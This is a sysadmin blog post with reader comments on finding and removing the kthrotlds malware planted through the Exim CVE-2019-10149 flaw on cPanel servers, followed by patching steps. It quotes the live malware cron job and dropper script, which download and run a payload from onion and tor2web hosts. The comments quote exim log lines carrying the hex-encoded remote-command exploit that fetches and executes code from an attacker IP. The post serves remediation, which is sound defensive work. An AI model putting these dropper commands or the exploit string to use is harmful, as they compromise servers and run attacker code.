kthrotlds CVE-2019-10149 Exim/cPanel

If you found some strange name process like [kthrotlds] running on your server, it
means your server could be affected by CVE-2019-10149 Exim security exploit. Of course process name can be different, first of all you need to kill it:

pkill -9 -f kthrotlds
ps aux | grep kthrotlds # To check if process still exists

Its binnary file created in /usr/bin/ directory:
/usr/bin/[kthrotlds]
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
You need quarantine it or just remove.

You can find TCP connection on this process, so its not kernel procesas like it would like to pretend in your process list.

While fixing this issue my advice is to stop crond service: service crond stop

Than you should find all files which could be affected:

grep -r passwd /var/spool/cron*

*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to ” && wget=”$f” && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk –retry 2 –connect-timeout 22 –max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /.cache/.ntp||${curl} -fsSLk –retry 2 –connect-timeout 22 –max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /.cache/.ntp||${curl} -fsSLk –retry 2 –connect-timeout 22 –max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /.cache/.ntp||${wget} –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=22 –timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /.cache/.ntp||${wget} –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=22 –timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /.cache/.ntp||${wget} –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=22 –timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /.cache/.ntp) && chmod +x /.cache/.ntp && /bin/sh /.cache/.ntp

You need to check /etc, /root, /usr/local/bin for bash/sh scripts with malware code, like:

#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST=”https://an7kmd2wp4xo7hpr”
TOR1=”.tor2web.su/”
TOR2=”.tor2web.io/”
TOR3=”.onion.sh/”
RPATH1=’src/ldm’
#LPATH=”${HOME-/tmp}/.cache/”
TIMEOUT=”75″
CTIMEOUT=”22″
COPTS=” -fsSLk –retry 2 –connect-timeout ${CTIMEOUT} –max-time ${TIMEOUT} ”
WOPTS=” –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=${CTIMEOUT} –timeout=${TIMEOUT} ”
tbin=$(command -v passwd); bpath=$(dirname “${tbin}”)
curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi
wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “.wgetrc’-style command” && wget=”$f” && break; done; fi; fi
#CHKCURL=’curl=”curl “; wget=”wget “; if [ “$(whoami)” = “root” ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl=”echo “; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget=”echo “; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; fi; ‘
CHKCURL=’tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to ” && wget=”$f” && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; ‘
LBIN8=”kthrotlds”
null=’ >/dev/null 2>&1′

If its cPanel server, you need to check Exim version like this:

whmapi1 installed_versions packages=1|grep exim

exim: 4.91-4
– exim-4.91-4.cp1170.x86_64

or simple exim –version
Exim version 4.91 #1 built 06-Jun-2019 12:52:02

To patch WHM and Exsim, if you have older versions like v76 or v70. To check your WHM version:

whmapi1 installed_versions packages=1|grep whm
cpanel_and_whm: 11.78.0.27

It means 78.0.27

or
cpanel_and_whm: 11.80.0.14

It means 80.0.14

vi /etc/cpupdate.conf
CPANEL=11.76
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily

Than:
/scripts/upcp

Than back:
vi /etc/cpupdate.conf
CPANEL=release
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily

P.s. Also you need to check /root/.ssh/authorized_keys, /etc/cron.d, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly and etc.

You can all modified file during last 5 days:
find /etc/ -mtime -5 -print

This malware script removes all your previous cron tasks, so you need to restore them from your backups and than enable cron service again.

Views All Time
Views All Time
1643
Views Today
Views Today
1

12 thoughts on “kthrotlds CVE-2019-10149 Exim/cPanel

  1. Hadi

    We have infected how could we remove this ?
    I have stopped cron service ;
    but these files not possible to remove /root/.ssh/authrozied_key
    /var/spool/cron/root file
    Thanks

    Reply
    1. Vitalijus Ryzakovas Post author

      /root/.ssh/authorized_keys is for passwordless SSH connection for the root user to access your server. So if you do not use private key to access your server, you need to empty this file like this:
      > /root/.ssh/authorized_keys
      if you are getting error about permissions issue, you need try: chattr -R -i /root and than > /root/.ssh/authorized_keys

      same with /var/spool/cron/root, just try:
      > /var/spool/cron/root

      Reply
    1. Vitalijus Ryzakovas Post author

      Maybe it’s fine if you have standalone exim server, but it’s not ok if you have cPanel or directadmin. cPanel use its own exim RPM version:
      yum list installed | grep exim
      exim.x86_64 4.92-1.cp1180 installed

      before running some scripts from github.com make sure you have backups of current configuration. especially /etc files.

      directadmin use source code, so you can update exim like this:
      /usr/local/directadmin/custombuild
      ./build update

      vi options.conf
      #Mail Settings
      exim=yes
      eximconf=yes

      Than run:
      ./build exim
      ./build exim_conf

      Reply
  2. zall e-padi

    Thank you for your information, I was found it on my machine and already removed by following your instructions.

    Please allow me to share this tutorial on my blog.

    Reply
  3. DrDaveD

    I got hit with this just over an hour before I applied the Debian patch. The first file modified was /etc/ssh/sshd_config. At around the same time the following was in the exim4 mainlog (fqdn redacted):

    2019-06-12 05:13:36 1hb0G8-0004Qa-MK <= H=(my.domain.name) [89.248.171.57] P=smtp S=824
    2019-06-12 05:13:37 1hb0G8-0004Qa-MK ** ${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e10\x2e68\x2e193\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2ejfmfrjdo\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejfmfrjdo\x20\x2dn\x20\x26\x22}}@my.domain.name: Too many “Received” headers – suspected mail loop

    Reply
    1. Vitalijus Ryzakovas Post author

      Everyone can find if attack still exist and find attacker IP address like this:

      cat /var/log/exim_mainlog | grep wget

      2019-06-13 19:11:02 1hbSJa-00BO3f-5u < = <> H=(xxx.xxxxxx.xxx) [89.248.171.57]:60454 P=smtp S=852 for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ecboiq\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ecboiq\x20\x2dn\x20\x26\x22}}@xxx.xxxxx.xxx
      2019-06-13 19:11:02 cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1hbSJa-00BO3f-5u
      2019-06-13 19:11:02 1hbSJa-00BO3f-5u ** root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ecboiq\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ecboiq\x20\x2dn\x20\x26\x22}}@xxx.cloxxxxxudlix.xxx: Too many “Received” headers – suspected mail loop

      This is Remote Command Execution exploit , it allows a local user to run commands as root due to an issue in the deliver message code

      Reply
  4. Chris Tong

    Hi. Thanks so much for all your help here! I have cPanel and am not finding a way to update Exim. I do a server software update in WHM, but the version remains 4.91 not 4.92. (exim-4.91-5.cp1178.x86_64).

    I’ve tried other recommendations for updating in SSH, but the version remains 4.91.

    You described how to update Exim with directadmin. Could you do the same for cPanel? I’d greatly appreciate it!

    Reply
    1. Vitalijus Ryzakovas Post author

      You can check exim version like this:

      exim --version
      Exim version 4.91 #1 built 06-Jun-2019 12:52:02

      as you can see built 06-Jun-2019 and its fine, because its patched version

      also you can check like this:
      whmapi1 installed_versions packages=1|grep exim
      exim: 4.91-4
      - exim-4.91-4.cp1170.x86_64

      Reply
      1. Chris Tong

        Thanks, Vitalijus.
        exim –version
        returns:
        Exim version 4.91 #1 built 07-Mar-2019 22:58:08
        It’s not the patched (June) version. And nothing I’ve tried so far seems to be able to get it upgraded to the June version. . . that’s why I was asking if you knew a direct way to do that upgrade Exim (apart from WHM/CPanel). Thanks!

        P.S. Would the Exim upgrade automatically happen if I successfully upgraded WHM/CPanel? I’m currently have version v78.0.23. I understand that the 78.0.27 version is patched, so I’ve been trying to use the WHM “Upgrade” function to upgrade to 78.0.30 — but the upgrade keeps stopping at 17% through. . . . Thanks.

        Reply

Leave a Reply

Your email address will not be published. Required fields are marked *